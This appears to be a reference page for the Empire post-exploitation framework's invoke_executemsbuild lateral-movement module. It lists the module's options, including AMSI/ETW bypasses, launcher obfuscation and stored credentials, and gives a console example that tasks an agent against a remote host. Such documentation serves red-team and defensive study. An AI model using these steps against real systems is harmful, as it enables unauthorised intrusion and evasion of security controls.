Invoke-ExecuteMSBuild - Empire Module


This page contains detailed information about how to use the powershell/lateral_movement/invoke_executemsbuild Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-ExecuteMSBuild
Module: powershell/lateral_movement/invoke_executemsbuild
Source code [1]: empire/server/modules/powershell/lateral_movement/invoke_executemsbuild.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/invoke_executemsbuild.py
MITRE ATT&CK: T1127, T1047
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No

The invoke_executemsbuild module utilizes WMI and MSBuild to compile and execute an xml file containing an Empire launcher.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_executemsbuild module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the invoke_executemsbuild module:

Agent
Agent to run module from.

ComputerName
Host to target.

Additional Module Options


This is a list of additional options that are supported by the invoke_executemsbuild module:

Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.

Command
Custom command to run.

CredID
CredID from the store to use.

DriveLetter
Drive letter to use when mounting the share locally.

FilePath
Desired location to copy the xml file on the target.

Listener
Listener to use.

Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.

ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.

Password
Password if executing with credentials.

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

UserName
UserName if executing with credentials.

Invoke_executemsbuild Example Usage


Here's an example of how to use the invoke_executemsbuild module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/invoke_executemsbuild

 Author       @xorrior                                                           
 Background   False                                                              
 Comments     Inspired by @subtee                                                
              http://subt0x10.blogspot.com/2016/09/bypassing-application-        
              whitelisting.html                                                  
 Description  This module utilizes WMI and MSBuild to compile and execute an xml 
              file containing an Empire launcher                                 
 Language     powershell                                                         
 Name         powershell/lateral_movement/invoke_executemsbuild                  
 NeedsAdmin   False                                                              
 OpsecSafe    False                                                              
 Techniques   http://attack.mitre.org/techniques/T1127                           
              http://attack.mitre.org/techniques/T1047                           


,Record Options----,--------------------,----------,-------------------------------------,
| Name             | Value              | Required | Description                         |
|------------------|--------------------|----------|-------------------------------------|
| Agent            |                    | True     | Agent to run module from.           |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses         | mattifestation etw | False    | Bypasses as a space separated list  |
|                  |                    |          | to be prepended to the launcher.    |
|------------------|--------------------|----------|-------------------------------------|
| Command          |                    | False    | Custom command to run.              |
|------------------|--------------------|----------|-------------------------------------|
| ComputerName     |                    | True     | Host to target                      |
|------------------|--------------------|----------|-------------------------------------|
| CredID           |                    | False    | CredID from the store to use.       |
|------------------|--------------------|----------|-------------------------------------|
| DriveLetter      |                    | False    | Drive letter to use when mounting   |
|                  |                    |          | the share locally                   |
|------------------|--------------------|----------|-------------------------------------|
| FilePath         |                    | False    | Desired location to copy the xml    |
|                  |                    |          | file on the target                  |
|------------------|--------------------|----------|-------------------------------------|
| Listener         |                    | False    | Listener to use.                    |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate        | False              | False    | Switch. Obfuscate the launcher      |
|                  |                    |          | powershell code, uses the           |
|                  |                    |          | ObfuscateCommand for obfuscation    |
|                  |                    |          | types. For powershell only.         |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1        | False    | The Invoke-Obfuscation command to   |
|                  |                    |          | use. Only used if Obfuscate switch  |
|                  |                    |          | is True. For powershell only.       |
|------------------|--------------------|----------|-------------------------------------|
| Password         |                    | False    | Password if executing with          |
|                  |                    |          | credentials                         |
|------------------|--------------------|----------|-------------------------------------|
| Proxy            | default            | False    | Proxy to use for request (default,  |
|                  |                    |          | none, or other).                    |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds       | default            | False    | Proxy credentials                   |
|                  |                    |          | ([domain\]username:password) to use |
|                  |                    |          | for request (default, none, or      |
|                  |                    |          | other).                             |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent        | default            | False    | User-agent string to use for the    |
|                  |                    |          | staging request (default, none, or  |
|                  |                    |          | other).                             |
|------------------|--------------------|----------|-------------------------------------|
| UserName         |                    | False    | UserName if executing with          |
|                  |                    |          | credentials                         |
'------------------'--------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/lateral_movement/invoke_executemsbuild) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/invoke_executemsbuild) > set ComputerName dbserver-01
[*] Set ComputerName to dbserver-01
(Empire: usemodule/powershell/lateral_movement/invoke_executemsbuild) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.